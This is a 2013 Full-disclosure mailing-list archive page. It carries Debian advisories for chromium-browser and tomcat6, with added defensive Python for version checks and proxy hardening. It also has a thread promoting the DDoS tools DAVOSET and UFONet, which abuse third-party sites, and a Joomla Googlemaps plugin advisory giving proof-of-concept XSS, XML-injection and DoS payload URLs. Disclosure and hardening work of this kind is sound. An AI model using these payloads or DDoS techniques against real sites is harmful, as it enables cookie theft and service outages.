[Full-disclosure] [SECURITY] [DSA 2724-1] chromium-browser security update

2013-07-18 Thread Michael Gilbert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2724-1   secur...@debian.org
http://www.debian.org/security/   Michael Gilbert
July 17, 2013  http://www.debian.org/security/faq
- -

Package: chromium-browser
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-2853 CVE-2013-2867 CVE-2013-2868 CVE-2013-2869
 CVE-2013-2870 CVE-2013-2871 CVE-2013-2873 CVE-2013-2875
 CVE-2013-2876 CVE-2013-2877 CVE-2013-2878 CVE-2013-2879
 CVE-2013-2880

Several vulnerabilities have been discovered in the Chromium web browser.

CVE-2013-2853

The HTTPS implementation does not ensure that headers are terminated
by \r\n\r\n (carriage return, newline, carriage return, newline).

CVE-2013-2867

Chrome does not properly prevent pop-under windows.

CVE-2013-2868

common/extensions/sync_helper.cc proceeds with sync operations for
NPAPI extensions without checking for a certain plugin permission
setting.

CVE-2013-2869

Denial of service (out-of-bounds read) via a crafted JPEG2000
image.

CVE-2013-2870

Use-after-free vulnerability in network sockets.

CVE-2013-2871

Use-after-free vulnerability in input handling.

CVE-2013-2873

Use-after-free vulnerability in resource loading.

CVE-2013-2875

Out-of-bounds read in SVG file handling.

CVE-2013-2876

Chrome does not properly enforce restrictions on the capture of
screenshots by extensions, which could lead to information
disclosure from previous page visits.

CVE-2013-2877

Out-of-bounds read in XML file handling.

CVE-2013-2878

Out-of-bounds read in text handling.

CVE-2013-2879

The circumstances in which a renderer process can be considered a
trusted process for sign-in and subsequent sync operations were
not properly checked.

CVE-2013-2880

The chrome 28 development team found various issues from internal
fuzzing, audits, and other studies.

For the stable distribution (wheezy), these problems have been fixed in
version 28.0.1500.71-1~deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 28.0.1500.71-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)
=gQNK
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] DDoS attacks via other sites execution tool

2013-07-18 Thread MustLive

Hello psy!

I'm glad that you liked DAVOSET. And I'm glad that you liked my articles,
including those old articles about attacks via redirectors (Redirectors'
hell and Hellfire for redirectors).

Such attacks can be used together with XSS holes, so they can be useful for
your tool. Especially for use with your UFONet (to use XSS holes with
looped redirectors to conduct more powerful DDoS attacks) I released an
advisory about Denial of Service vulnerabilities in WordPress on 27.06.2013.
Any redirector at any web site, or any redirector service, can be used with
XSS vulnerabilities to conduct a DDoS attack via UFONet.


> Curiously, I posted a tool written in python the same day. It is called:
> UFONet


I made my tool already in 2010. At that time I made an announcement of the
tool, where I described DAVOSET and its effectiveness, but didn't release
the tool. I kept it private and gave it only to one security researcher who
wanted to look at it. I didn't want to give such a kind of attacking tool to
script kiddies (to prevent mass attacks, because there were a lot of such Abuse
of Functionality vulnerabilities on the Internet since 2007, when I started
finding them and presenting them in zombies-lists with my tool). But because
for three years people continued to ignore such holes and almost nobody fixed
them (just a few of the most serious ones, and even Yahoo lamerly ignored such
a hole in their Babelfish for a long time and in 2012 just lamerly closed it),
I decided to release it publicly in June 2013.


> My idea now is to work on the detection of new 'zombies' by crawling
> techniques and increase the "strike" capability requests.


Good ideas. But concerning automated searching for XSS holes by crawling:
it'll already be an XSS scanner, not just an attacking tool for using existing
vulnerabilities, and it'll give a lot of power to an attacker. No need for
him to find XSS holes; your tool will do everything for him ;-). Just enter the
target site and UFONet will do all the work (find a lot of zombies and
attack the target with all of them), so be careful with such functionality.


> I have seen that your tool doesn't allow the use of proxies. It may be
> interesting to add that functionality.


Thanks for the suggestion. I've added it to my ToDo, in addition to all my ideas
(of which I have a lot). The reason why I've not done it earlier and was
not planning to is simple: DAVOSET is using other sites as proxies for
conducting DoS attacks. So target sites, after receiving DDoS attacks from
multiple zombie sites, will see in their logs only Google, W3C and other
sites/IPs. So proxying is part of the attack :-). But for paranoids who worry
that admins of zombie sites will give their logs to admins of victim sites
(or not admins, but special services), an additional proxy will be a good
solution (and I'll add proxy support in the future).


> + Video: http://vimeo.com/68772290


I've seen your video. And I wrote you feedback about the video and some feedback
about UFONet last month, and will write more feedback soon.

Keep working on your software. Concerning your release of v.0.2: think about
making a more detailed changelog (not just a mention of the release of a new
version, but with a detailed description of the changes).


Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message - 
From: "psy" 

To: "MustLive" 
Cc: ; 
Sent: Wednesday, June 19, 2013 10:25 PM
Subject: Re: [Full-disclosure] DDoS attacks via other sites execution tool



Hi,

On 18/06/13 22:50, MustLive wrote:

> Hello participants of Mailing List.
>
> If you haven't read my article (written in 2010; last week I wrote about
> it to the WASC list) "Advantages of attacks on sites with using other sites"
> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008846.html),
> feel free to do it. In this article I reminded you about using sites
> for attacks on other sites
> (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html),
> DDoS attacks via other sites execution tool (DAVOSET)
> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html),
> sending spam via sites and creating spam-botnets
> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html)
> and wrote about advantages of attacks on sites with using other sites.


I have read the articles and they are very interesting, for example, the
"hell" redirection. This kind of web abuse can be very powerful.

Nice work! ;-)


> Last week I published online my DDoS attacks via other sites execution
> tool (http://websecurity.com.ua/davoset/). It's a tool for conducting
> DDoS attacks via Abuse of Functionality vulnerabilities on sites,
> which I made in 2010. The description and changelog in English are
> presented at my site, where you can get my DAVOSET v.1.0.5 (made on 18.07.2010).


Curiously, I posted a tool written in python the same day. It is called:
UFONet

http://ufonet.sf.net

At first, I designed a

[Full-disclosure] [SECURITY] [DSA 2725-1] tomcat6 security update

2013-07-18 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2725-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 18, 2013  http://www.debian.org/security/faq
- -

Package: tomcat6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-3544 CVE-2013-2067

Two security issues have been found in the Tomcat servlet and JSP engine:

CVE-2012-3544

The input filter for chunked transfer encodings could trigger high 
resource consumption through malformed CRLF sequences, resulting in 
denial of service.

CVE-2013-2067

The FormAuthenticator module was vulnerable to session fixation.

For the oldstable distribution (squeeze), these problems have been fixed in
version 6.0.35-1+squeeze3. This update also provides fixes for 
CVE-2012-2733, CVE-2012-3546, CVE-2012-4431, CVE-2012-4534, CVE-2012-5885,
CVE-2012-5886 and CVE-2012-5887, which were all fixed for stable already.

For the stable distribution (wheezy), these problems have been fixed in
version 6.0.35-6+deb7u1.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your tomcat6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHoLKoACgkQXm3vHE4uylp56QCff9NXUl0J3tcY6bjyROYrMWh5
kekAoJb3+ErnUADVo4tpir+woaK+7lma
=bdVm
-END PGP SIGNATURE-

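Both advisories above end by naming the version in which the problems are fixed, and the practical step for a defender is to compare what is actually installed against that version. Debian's ordering rules are easy to get wrong by hand: `~` sorts before everything (so `28.0.1500.71-1~deb7u1` is older than `28.0.1500.71-1`), an epoch before `:` overrides everything else, and the revision is split off at the last `-`. The following is an added example, not Debian's or dpkg's code: it pulls the fixed versions out of the DSA-2724-1 text quoted above and reimplements dpkg's comparison in Python so it can run on an inventory collected from many hosts. The installed version in the demo is a constructed value, not a real chromium-browser upload.

```python
"""Check an installed Debian package version against the fixed version a DSA quotes.

Added example for the two advisories above; not Debian's or dpkg's own code.
It reimplements the dpkg version ordering (Debian Policy 5.6.12) in plain
Python.  The installed version used in the demo is a constructed value."""
import re
from typing import Dict, Tuple

# Excerpt of DSA-2724-1 exactly as quoted above (the advisory's own wording).
DSA_2724_EXCERPT = """\
For the stable distribution (wheezy), these problems have been fixed in
version 28.0.1500.71-1~deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 28.0.1500.71-1.
"""

FIXED_RE = re.compile(
    r"For the \w+ distribution \((\w+)\), these problems have been fixed in"
    r"\s+version (\S+)")


def fixed_versions_from_advisory(text: str) -> Dict[str, str]:
    """Map suite codename -> fixed version; suites that are 'fixed soon' are omitted."""
    return {m.group(1): m.group(2).rstrip(".") for m in FIXED_RE.finditer(text)}


def _order(c: str) -> int:
    """dpkg's weight for one character of a non-digit run: '~' sorts before
    everything (even end-of-string), then end-of-string, then letters by
    ASCII value, then every other character."""
    if c == "" or c.isdigit():
        return 0
    if c == "~":
        return -1
    if c.isalpha():
        return ord(c)
    return ord(c) + 256


def _verrevcmp(a: str, b: str) -> int:
    """Compare two upstream-version or debian-revision strings the way dpkg's
    verrevcmp does: alternate non-digit runs (lexically via _order) and digit
    runs (numerically, leading zeros ignored)."""
    while a or b:
        first_diff = 0
        while (a and not a[0].isdigit()) or (b and not b[0].isdigit()):
            ac, bc = _order(a[:1]), _order(b[:1])
            if ac != bc:
                return ac - bc
            a, b = a[1:], b[1:]
        a, b = a.lstrip("0"), b.lstrip("0")
        while a[:1].isdigit() and b[:1].isdigit():
            if not first_diff:
                first_diff = ord(a[0]) - ord(b[0])
            a, b = a[1:], b[1:]
        if a[:1].isdigit():
            return 1          # a has more digits, so it is the larger number
        if b[:1].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def parse_version(version: str) -> Tuple[int, str, str]:
    """Split '[epoch:]upstream[-revision]'.  The revision is everything after
    the *last* '-', so hyphens inside the upstream part are preserved."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:
        upstream, revision = revision, ""
    return epoch, upstream, revision


def compare_versions(a: str, b: str) -> int:
    """Negative, zero or positive, like dpkg --compare-versions lt / eq / gt."""
    ea, ua, ra = parse_version(a)
    eb, ub, rb = parse_version(b)
    if ea != eb:
        return ea - eb
    return _verrevcmp(ua, ub) or _verrevcmp(ra, rb)


def is_fixed(installed: str, fixed: str) -> bool:
    """True when the installed version is at least the advisory's fixed version."""
    return compare_versions(installed, fixed) >= 0


if __name__ == "__main__":
    fixed = fixed_versions_from_advisory(DSA_2724_EXCERPT)
    installed = "28.0.1500.52-1~deb7u1"   # constructed: an older wheezy build
    print("fixed versions:", fixed)
    print(installed, "is", "fixed" if is_fixed(installed, fixed["wheezy"]) else "still vulnerable")
    # The wheezy build sorts below the sid build because '~' sorts before everything.
    print(compare_versions("28.0.1500.71-1~deb7u1", "28.0.1500.71-1"))
```

On a Debian host itself the equivalent check is `dpkg --compare-versions "$(dpkg-query -W -f '${Version}' chromium-browser)" ge 28.0.1500.71-1~deb7u1`; the Python version is for version strings gathered from elsewhere, where dpkg is not available.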


Re: [Full-disclosure] Multiple vulnerabilities in Googlemaps plugin for Joomla

2013-07-18 Thread Źmicier Januszkiewicz
Ah, and as a side effect, you get a bunch of free HTTP proxies -- the
script will fetch and print anything. Just to fix up the content type, but
this should not be an issue.

Finally, something useful.

I leave the google dork as an exercise for the reader.

Cheers,
Z.


2013/7/16 MustLive 

> Hello list!
>
> These are Denial of Service, XML Injection, Cross-Site Scripting and Full
> path disclosure vulnerabilities in Googlemaps plugin for Joomla.
>
> -
> Affected products:
> -
>
> Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x, and
> potentially previous versions. In the new version of DAVOSET I'll add a lot of
> web sites with the Googlemaps plugin.
>
> -
> Affected vendors:
> -
>
> Mike Reumer
> http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147
>
> --
> Details:
> --
>
> Denial of Service (WASC-10):
>
> http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file
>
> Besides conducting a DoS attack manually, it's also possible to conduct
> automated DoS and DDoS attacks using DAVOSET
> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
>
> XML Injection (WASC-23):
>
> http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml
>
> It's possible to include external XML files, which also can be used for an
> XSS attack:
>
> XSS via XML Injection (WASC-23):
>
> http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml
>
> File xss.xml:
>
> 
> 
>  XSS
>  
>  http://www.w3.org/1999/xhtml
> ">alert(document.cookie)
>  
> 
>
> Cross-Site Scripting (WASC-08):
>
> http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E
>
> Full path disclosure (WASC-13):
>
> http://site/plugins/content/plugin_googlemap2_proxy.php
>
> Besides plugin_googlemap2_proxy.php, the same happens with
> plugin_googlemap3_proxy.php (but it has a different path at web sites).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
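The quoted advisory and the reply above describe one root cause: the plugin's proxy script fetches whatever `url` it is given and echoes the result, which is what makes it an open proxy, a DoS vector (large files) and an XSS vector (proxied XML, or the reflected parameter in the error path). The following is an added example, not the plugin's code (which is PHP): a Python sketch of the checks a hardened relay endpoint applies before and after fetching. The allowed host names, the size limit and the stand-in fetch function are assumptions made for the example.

```python
"""Hardening checks for a 'fetch this URL and echo it back' proxy endpoint.

Added example, not the Googlemaps plugin's code: it shows the checks whose
absence the advisory above reports.  ALLOWED_HOSTS, MAX_BODY_BYTES and the
constructed upstream are assumptions so the example runs offline."""
import io
import ipaddress
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumption: the only origins a map plugin legitimately needs to reach.
ALLOWED_HOSTS = frozenset({"maps.googleapis.com", "maps.google.com"})
MAX_BODY_BYTES = 256 * 1024  # assumption: map data is small, so cap it hard


def check_target(url: str, allowed_hosts=ALLOWED_HOSTS) -> Tuple[bool, str]:
    """Decide whether `url` may be fetched.  Exact host match only: suffix or
    substring matching would let attacker-controlled names through."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"       # also rejects bare paths and HTML junk
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = (parts.hostname or "").lower()
    if not host:
        return False, "missing host"
    try:
        ipaddress.ip_address(host)
        return False, "IP literals not allowed"  # keeps internal addresses out
    except ValueError:
        pass
    if host not in allowed_hosts:
        return False, "host not in allowlist"
    return True, "ok"


def read_body_limited(stream, limit: int = MAX_BODY_BYTES) -> Optional[bytes]:
    """Read at most `limit` bytes; None if the upstream body is larger.
    Reading limit+1 bytes detects overflow without buffering the whole file."""
    data = stream.read(limit + 1)
    return None if len(data) > limit else data


def relay_headers(body: bytes) -> Dict[str, str]:
    """Headers for handing map XML to the page's own XHR calls.  A fixed type
    plus nosniff stops the browser treating the body as HTML, and the attachment
    disposition stops it rendering if someone opens the proxy URL directly."""
    return {
        "Content-Type": "application/xml; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="map.xml"',
        "Content-Length": str(len(body)),
    }


def handle_proxy_request(url: str, fetch: Callable[[str], io.IOBase]) -> Tuple[int, Dict[str, str], bytes]:
    """Validate, fetch, cap and relay.  Error responses carry a fixed message
    and never echo `url`, which removes the reflected XSS vector."""
    ok, _reason = check_target(url)
    if not ok:
        return 400, {"Content-Type": "text/plain"}, b"invalid proxy target"
    body = read_body_limited(fetch(url))
    if body is None:
        return 502, {"Content-Type": "text/plain"}, b"upstream response too large"
    return 200, relay_headers(body), body


def constructed_upstream(size: int) -> Callable[[str], io.BytesIO]:
    """Constructed stand-in for the HTTP fetch so the example runs offline:
    size 0 yields a tiny XML document, any other size yields that many bytes."""
    return lambda _url: io.BytesIO(b"<markers/>" if size == 0 else b"x" * size)


if __name__ == "__main__":
    # Inputs modelled on the advisory's placeholders plus one legitimate target.
    for candidate in ("site2/large_file",
                      "http://site2/xss.xml",
                      "https://maps.googleapis.com/maps/api/geocode/xml?address=Berlin"):
        print(candidate, "->", check_target(candidate))
    status, _, _ = handle_proxy_request("https://maps.googleapis.com/x",
                                        constructed_upstream(MAX_BODY_BYTES + 1))
    print("oversize upstream body ->", status)
```

The design choice worth noting is that every rejection path returns a constant message: the reflected XSS in the advisory comes from the script echoing its `url` parameter, so the fix is not to escape it but never to emit it at all. Logging the rejected value server-side for detection is fine; returning it to the browser is not.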